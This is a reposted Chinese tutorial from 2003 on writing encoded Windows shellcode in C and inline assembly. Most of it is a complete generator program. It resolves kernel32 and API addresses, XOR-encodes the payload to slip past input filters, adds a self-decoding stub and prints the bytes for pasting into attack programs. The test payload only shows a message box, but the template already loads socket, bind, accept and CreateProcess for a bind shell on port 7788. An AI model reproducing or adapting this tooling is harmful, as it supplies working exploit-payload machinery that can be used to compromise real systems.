分享
 
 
 

(转载)关于Windows下ShellCode编写的一点思考

王朝system·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

关于Windows下ShellCode编写的一点思考转自:http://www.xfocus.net

创建时间:2003-11-30

文章属性:转载

文章提交:l0pht (anonymous_at_21cn.com)

关于Windows下ShellCode编写的一点思考

By Hume/冷雨

关于ShellCode编写的文章可谓多如牛毛。经典的有yuange、watercloud等前辈的文

章,但大都过于专业和简练,对我这样的初学者学习起来还是有不小的难度。因此把自己

的一点想法记录下来,以慰同菜。

我不是工具论者,但合适的工具无疑会提高工作效率,而如何选取合适的工具和编写

ShellCode的目的及ShellCode的运行环境是直接相关的。ShellCode一般是通过溢出等

方式获取执行权的,并且要在执行时调用目标系统的API进行一些工作,因此就要求

ShellCode采用一种较为通用的方法获取目标系统的API函数地址,其次由于其运行地址

难以确定,因此对数据的寻址要采用动态的方法。另外,ShellCode一般是作为数据发送

给受攻击程序的,而受攻击程序一般会对数据进行过滤,这对ShellCode提出了编码的要

求,现在ShellCode用的编码方法比较简单,基本是XOR大法或其变形。

编写ShellCode有目前流行的有两种方法:用C语言编写+提取;用汇编语言编写和提取。

就个人感觉而言,用汇编语言编写和提取是最方便的,因为ShellCode代码一般比较短,要

完成的任务也相对单一,一般不涉及复杂的运算。因此可以用汇编语言编写。而且用汇编

编写便于数据的控制、代码定位及生成的控制,在某些汇编编译器中,提供了直接生成二进制

代码功能并提供了直接包含二进制文件的伪指令,这样就可以直接编写一个makefile文件将

ShellCode代码和攻击程序分开,分别编写和调试,而无需print、拷贝、粘贴等操作,只需

在攻击程序中加入一段编码代码就可以了。这样也便于交流。

但现在网络上流行的都是C编写的ShellCode,不过最终要生成的是ShellCode代码,这就涉

及到提取C生成的汇编代码的问题。但在C中由于编译器会在函数的开始和结束生成一些附加

代码,而这些代码未必是我们需要的,还有一个问题就是要提取代码的结束在C中没有直接的

操作符获取。这些实际上也都不是很难,只要在函数的开始和结束加入特征字符串用C库函数

memcmp搜索即可定位。对ShellCode的编码可写一段程序进行,比如XOR法的。最后写一段

函数将编码后的ShellCode打印出来,复制、粘贴就可以用在攻击程序里面了。

用C编写的中心思想就是我们用C语言写代码,让编译器为我们生成二进制代码,然后在运行时

编码、打印,这样工作就完成了。

在网上找到了一个用C编写ShellCode的例子,于是亲自调试了一遍,发现了一些问题后修改

并加入一些自己的代码,测试通过。

其中的一些问题有:

1.KERNEL基地址的定位和API函数地址的获取

原来的代码中采用的是暴力搜索地址空间的方法。这不算最佳方法,因为一是代码比较多,

二是要处理搜索无效页面引发的异常。现在还有两种方法可用:

一种是从PEB相关数据结构中获取,请参考绿盟月刊44期SCZ的《通过TEB/PEB枚举当前进程

空间中用户模块列表》一文。代码如下:

mov eax, fs:0x30

mov eax, [eax + 0x0c]

mov esi, [eax + 0x1c]

lodsd

mov ebp, [eax + 0x08] //ebp 就是kernel32.dll的地址了

这种方法比较通用,适用于2K/XP/2003。

另外一种方法就是搜索进程的SEH链表获取Kernel32.UnhandledExceptionFilter的地址,

再由该地址对齐追溯获得Kernel的基地址,这种方法也是比较通用的,适用于9X/2K/XP/2003。

在下面的代码中我就采用了这种方法。

2.几段代码的作用

在ShellCode提取代码中你或许会经常见到

temp = *shellcodefnadd;

if(temp == 0xe9)

{

++shellcodefnadd;

k=*(int *)shellcodefnadd;

shellcodefnadd+=k;

shellcodefnadd+=4;

}

这样的代码,其用途何在?答案在于在用Visual Studio生成调试版本的时候,用函数指针

操作获得的地址并不是指向真正的函数入口点,而是指向跳转指令JMP:

jmp function

上面那段代码就是处理这种情况的,如果不是为了调试方便,完全可以删去。

还有在代码中会看到:

jmp decode_end

decode_start:

pop edx

.......

decode_end:

call decode_start

Shell_start:

之类的代码其作用是定位Shell_start处的代码,便于装配,由于在C中没有方便的手段定位

代码的长度和位置,因此采用此变通的做法。在这种方法不符合编码的要求时,可以采用动态计算

和写入的方法。不过复杂了一点罢了。

3.关于局部变量的地址顺序

在原程序中采用了如下局部变量结构:

FARPROC WriteFileadd;

FARPROC ReadFileadd;

FARPROC PeekNamedPipeadd;

FARPROC CloseHandleadd;

FARPROC CreateProcessadd;

FARPROC CreatePipeadd;

FARPROC procloadlib;

FARPROC apifnadd[1];

以为这样编译器生成的变量地址顺序就是这样的,在有些机器上也许如此,不过在我的

机器上则不然,比如下面的测试程序:

#include <windows.h>

#include <stdio.h>

#include <tchar.h>

#include <winioctl.h>

void shell();

void __cdecl main(int argc,char *argv[])

{

FARPROC arg1;

FARPROC arg2;

FARPROC arg3;

FARPROC arg4;

FARPROC arg5;

int par1;

int par2;

int par3;

int par4;

char ch;

printf("Size of FARPROC %d\n",sizeof(FARPROC));

printf("\n%X\n%X\n%X\n%X\n%X\n\n \t%X\n%X\n%X\n%X\n \t%X\n",

&arg1,

&arg2,

&arg3,

&arg4,

&arg5,

&par1,

&par2,

&par3,

&par4,

&ch

);

}

在我机器上产生的输出是:

12FF7C

12FF78

12FF74

12FF70

12FF68

12FF6C

12FF64

12FF60

12FF5C

12FF58

这证实了局部变量的实际地址并不是完全按我们自己定义排列的。因此原来ShellCode中采用的

直接使用函数名的方法就可靠了。因此我采用了其它的方法,C提供的Enum关键字使得这项

工作变得容易,详见下面的代码。

4.more

关于变形ShellCode躲避IDS检测,以及编码方法等需进一步研究。

5.代码

可见,用C编写ShellCode需要对代码生成及C编译器行为有更多了解。有些地方处理起来也

不是很省力。不过一旦模板写成,以后写起来或写复杂ShellCode就省力多了。

增加API时只要在相应的.dll后增加函数名称项(如果str中还没有相应的dll,增加之)并

同步更新Enum的索引即可。调用API时直接使用:

API[_APINAME](param,....param);

即可。

如果没注释掉有#define DEBUG 1的话,下面代码编译后运行即可对ShellCode进行调试,

下面代码将弹出一个对话框,点击确定即可结束程序。that's ALL。

-------------------------------------------

/*

使用C语言编写通用shellcode的程序

出处:internet

修改:Hume/冷雨飘心

测试:Win2K SP4 Local

*/

#include <windows.h>

#include <stdio.h>

#include <winioctl.h>

#define DEBUG 1

//

//函数原型

//

void DecryptSc();

void ShellCodes();

void PrintSc(char *lpBuff, int buffsize);

//

//用到的部分定义

//

#define BEGINSTRLEN 0x08 //开始字符串长度

#define ENDSTRLEN 0x08 //结束标记字符的长度

#define nop_CODE 0x90 //填充字符

#define nop_LEN 0x0 //ShellCode起始的填充长度

#define BUFFSIZE 0x20000 //输出缓冲区大小

#define sc_PORT 7788 //绑定端口号 0x1e6c

#define sc_BUFFSIZE 0x2000 //ShellCode缓冲区大小

#define Enc_key 0x7A //编码密钥

#define MAX_Enc_Len 0x400 //加密代码的最大长度 1024足够?

#define MAX_Sc_Len 0x2000 //hellCode的最大长度 8192足够?

#define MAX_api_strlen 0x400 //APIstr字符串的长度

#define API_endstr "strend"//API结尾标记字符串

#define API_endstrlen 0x06 //标记字符串长度

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90

#define PROC_END PROC_BEGIN

//---------------------------------------------------

enum{ //Kernel32

_CreatePipe,

_CreateProcessA,

_CloseHandle,

_PeekNamedPipe,

_ReadFile,

_WriteFile,

_ExitProcess,

//WS2_32

_socket,

_bind,

_listen,

_accept,

_send,

_recv,

_ioctlsocket,

_closesocket,

//本机测试User32

_MessageBeep,

_MessageBoxA,

API_num

};

//

//代码这里开始

//

int __cdecl main(int argc, char **argv)

{

//shellcode中要用到的字符串

static char ApiStr[]="\x1e\x6c" //端口地址

//Kernel32的API函数名称

"CreatePipe""\x0"

"CreateProcessA""\x0"

"CloseHandle""\x0"

"PeekNamedPipe""\x0"

"ReadFile""\x0"

"WriteFile""\x0"

"ExitProcess""\x0"

//其它API中用到的API

"wsock32.dll""\x0"

"socket""\x0"

"bind""\x0"

"listen""\x0"

"accept""\x0"

"send""\x0"

"recv""\x0"

"ioctlsocket""\x0"

"closesocket""\x0"

//本机测试

"user32.dll""\x0"

"MessageBeep""\x0"

"MessageBoxA""\x0"

"\x0\x0\x0\x0\x0"

"strend";

char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; //标记开始的字符串

char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; //标记结束的字符串

char buff[BUFFSIZE]; //缓冲区

char sc_buff[sc_BUFFSIZE]; //ShellCodes缓冲

char *pDcrypt_addr,

*pSc_addr;

int buff_len; //缓冲长度

int EncCode_len; //加密编码代码长度

int Sc_len; //原始ShellCode的长度

int i,k;

unsigned char ch;

//

//获得DecryptSc()地址,解码函数的地址,然后搜索MAX_Enc_Len字节,查找标记开始的字符串

//获得真正的解码汇编代码的开始地址,MAX_Enc_Len定义为1024字节一般这已经足够了,然后将这

//部分代码拷贝入待输出ShellCode的缓冲区准备进一步处理

//

pDcrypt_addr=(char *)DecryptSc;

//定位其实际地址,因为在用Visual Studio生成调试版本调试的情况下,编译器会生成跳转表,

//从跳转表中要计算得出函数实际所在的地址,这只是为了方便用VC调试

ch=*pDcrypt_addr;

if (ch==0xe9)

{

pDcrypt_addr++;

i=*(int *)pDcrypt_addr;

pDcrypt_addr+=(i+4); //此时指向函数的实际地址

}

//找到解码代码的开始部分

for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;

if (k<MAX_Enc_Len) pDcrypt_addr+=(k+8); //如找到定位实际代码的开始

else

{

//显示错误信息

k=0;

printf("\nNo Begin str defined in Decrypt function!Please Check before go on...\n");

return 0;

}

for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)==0) break;

if (k<MAX_Enc_Len) EncCode_len=k;

else

{

k=0;

printf("\nNo End str defined in Decrypt function!Please Check....\n");

return 0;

}

memset(buff,nop_CODE,BUFFSIZE); //缓冲区填充

memcpy(buff+nop_LEN,pDcrypt_addr,EncCode_len); //把DecryptSc代码复制进buff

//

//处理ShellCode代码,如果需要定位到代码的开始

//

pSc_addr=(char *)ShellCodes; //shellcode的地址

//调试状态下的函数地址处理,便于调试

ch=*pSc_addr;

if (ch==0xe9)

{

pSc_addr++;

i=*(int *)pSc_addr;

pSc_addr+=(i+4); //此时指向函数的实际地址

}

//如果需要定位到实际ShellCodes()的开始,这个版本中是不需要的

/*

for (k=0;k<MAX_Sc_Len ;++k ) if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;

if (k<MAX_Enc_Len) pSc_addr+=(k+8); //如找到定位实际代码的开始

*/

//找到shellcode的结尾及长度

for(k=0;k<MAX_Sc_Len;++k) if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)==0) break;

if (k<MAX_Sc_Len) Sc_len=k;

else

{

k=0;

printf("\nNo End str defined in ShellCodes function!Please Check....\n");

return 0;

}

//把shellcode代码复制进sc_buff

memcpy(sc_buff,pSc_addr,Sc_len);

//把字符串拷贝在shellcode的结尾

for(i=0;i<MAX_api_strlen;++i) if(memcmp(ApiStr+i,"strend",API_endstrlen)==0) break;

if(i>=MAX_api_strlen)

{

printf("\nNo End str defined in API strings!Please Check....\n");

return 0;

}

memcpy(sc_buff+k,ApiStr,i);

Sc_len+=i; //增加shellcode的长度

//

//对shellcode进行编码算法简单,可根据需要改变

//

k=EncCode_len+nop_LEN; //定位缓冲区应存放ShellCode地址的开始

for(i=0;i<Sc_len;++i){

ch=sc_buff[i]^Enc_key;

//对一些可能造成shellcode失效的字符进行替换

if(ch<=0x1f||ch==' '||ch=='.'||ch=='/'||ch=='\\'||ch=='0'||ch=='?'||ch=='%'||ch=='+')

{

buff[k]='0';

++k;

ch+=0x31;

}

//把编码过的shellcode放在DecryptSc代码后面

buff[k]=ch;

++k;

}

//shellcode的总长度

buff_len=k;

//打印出shellcode

PrintSc(buff,buff_len);

//buff[buff_len]=0;

//printf("%s",buff);

#ifdef DEBUG

_asm{

lea eax,buff

jmp eax

ret

}

#endif

return 0;

}

//解码shellcode的代码

void DecryptSc()

{

__asm{

/////////////////////////

//定义开始标志

/////////////////////////

PROC_BEGIN //C macro to begin proc

jmp next

getEncCodeAddr:

pop edi

push edi

pop esi

xor ecx,ecx

Decrypt_lop:

lodsb

cmp al,cl

jz shell

cmp al,0x30 //判断是否为特殊字符

jz special_char_clean

store:

xor al,Enc_key

stosb

jmp Decrypt_lop

special_char_clean:

lodsb

sub al,0x31

jmp store

next:

call getEncCodeAddr

//其余真正加密的shellcode代码会连接在此处

shell:

/////////////////////////

//定义结束标志

/////////////////////////

PROC_END //C macro to end proc

}

}

//

//shellcode代码

//

void ShellCodes()

{

//API低址数组

FARPROC API[API_num];

//自己获取的API地址

FARPROC GetProcAddr;

FARPROC LoadLib;

HANDLE hKrnl32;

HANDLE libhandle;

char *ApiStr_addr,*p;

int k;

u_short shellcodeport;

//测试用变量

char *testAddr;

/*

STARTUPINFO siinfo;

SOCKET listenFD,clientFD;

struct sockaddr_in server;

int iAddrSize = sizeof(server);

int lBytesRead;

PROCESS_INFORMATION ProcessInformation;

HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

SECURITY_ATTRIBUTES sa;

*/

_asm {

jmp locate_addr0

getApiStr_addr:

pop ApiStr_addr

//开始获取API的地址以及GetProcAddress和LoadLibraryA的地址

//以后就可以方便地获取任何API的地址了

//保护寄存器

pushad

xor esi,esi

lods dword ptr fs:[esi]

Search_Krnl32_lop:

inc eax

je Krnl32_Base_Ok

dec eax

xchg esi,eax

LODSD

jmp Search_Krnl32_lop

Krnl32_Base_Ok:

LODSD

;compare if PE_hdr

xchg esi,eax

find_pe_header:

dec esi

xor si,si ;kernel32 is 64kb align

mov eax,[esi]

add ax,-'ZM' ;

jne find_pe_header

mov edi,[esi+3ch] ;.e_lfanew

mov eax,[esi+edi]

add eax,-'EP' ;anti heuristic change this if you are using MASM etc.

jne find_pe_header

push esi

;esi=VA Kernel32.BASE

;edi=RVA K32.pehdr

mov ebx,esi

mov edi,[ebx+edi+78h] ;peh.DataDirectory

push edi

push esi

mov eax,[ebx+edi+20h] ;peexc.AddressOfNames

mov edx,[ebx+edi+24h] ;peexc.AddressOfNameOrdinals

call __getProcAddr

_emit 0x47

_emit 0x65

_emit 0x74

_emit 0x50

_emit 0x72

_emit 0x6F

_emit 0x63

_emit 0x41

_emit 0x64

_emit 0x64

_emit 0x72

_emit 0x65

_emit 0x73

_emit 0x73

_emit 0x0

//db "GetProcAddress",0

__getProcAddr:

pop edi

mov ecx,15

sub eax,4

next_:

add eax,4

add edi,ecx

sub edi,15

mov esi,[ebx+eax]

add esi,ebx

mov ecx,15

repz cmpsb

jnz next_

pop esi

pop edi

sub eax,[ebx+edi+20h] ;peexc.AddressOfNames

shr eax,1

add edx,ebx

movzx eax,word ptr [edx+eax]

add esi,[ebx+edi+1ch] ;peexc.AddressOfFunctions

add ebx,[esi+eax*4] ;ebx=Kernel32.GetProcAddress.addr

;use GetProcAddress and hModule to get other func

pop esi ;esi=kernel32 Base

mov [hKrnl32],esi //保存

mov [GetProcAddr],ebx //保存

call _getLoadLib

_emit 0x4C

_emit 0x6F

_emit 0x61

_emit 0x64

_emit 0x4C

_emit 0x69

_emit 0x62

_emit 0x72

_emit 0x61

_emit 0x72

_emit 0x79

_emit 0x41

_emit 0x0

//db "LoadLibraryA",0

_getLoadLib:

push esi

call ebx

mov [LoadLib],eax

//恢复寄存器,避免更多问题

popad

}

//取出定义的端口地址

shellcodeport=*(u_short *)ApiStr_addr;

ApiStr_addr+=2;

////////////////////////////////测试用

testAddr=ApiStr_addr;

////////////////////////////////////

//利用GetProcAddress来获得shellcode中所用到的API地址

libhandle=hKrnl32;

p=ApiStr_addr;

k=0;

///*

while ( *((unsigned int *)p) != 0)

{

ApiStr_addr=p;

while(*p) p++; //前进到下一个字符串

if (*( (unsigned int *)(p-4))=='lld.')

{

libhandle=(HANDLE)LoadLib(ApiStr_addr); //若为DLL则加载DLL

}

else

{

API[k]=(FARPROC)GetProcAddr(libhandle,ApiStr_addr);

k++;

}

ApiStr_addr=++p; //更新指针前进一个字符位置

}

//*/

///////////////////////////////////////////////////////////////////////////

// 下面就可以使用C语言来编写真正实现功能的shellcode了 //

///////////////////////////////////////////////////////////////////////////

//

//简单测试几个API看是否复合要求

//

API[_MessageBeep](0x10);

API[_MessageBoxA](0,testAddr,0,0x40);

API[_ExitProcess](0);

///////////////////////////////////////////////////////////////////////////

// shellcode功能部分结束 //

///////////////////////////////////////////////////////////////////////////

//死循环

die:

goto die;

__asm

{

locate_addr0:

call getApiStr_addr //5 bytes

//真正的字符串数据要连接在此处

/////////////////////////

//定义结束标志

/////////////////////////

PROC_END //C macro to end proc

}

}

//

//显示打印生成的shellcode的C string格式代码

//

void PrintSc(char *lpBuff, int buffsize)

{

int i,j;

char *p;

char msg[4];

for(i=0;i<buffsize;i++)

{

if((i%16)==0)

if(i!=0)

printf("\"\n\"");

else

printf("\"");

sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);

for( p = msg, j=0; j < 4; p++, j++ )

{

if(isupper(*p))

printf("%c", _tolower(*p));

else

printf("%c", p[0]);

}

}

printf("\";\n/*Shell total are %d bytes */\n",buffsize);

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有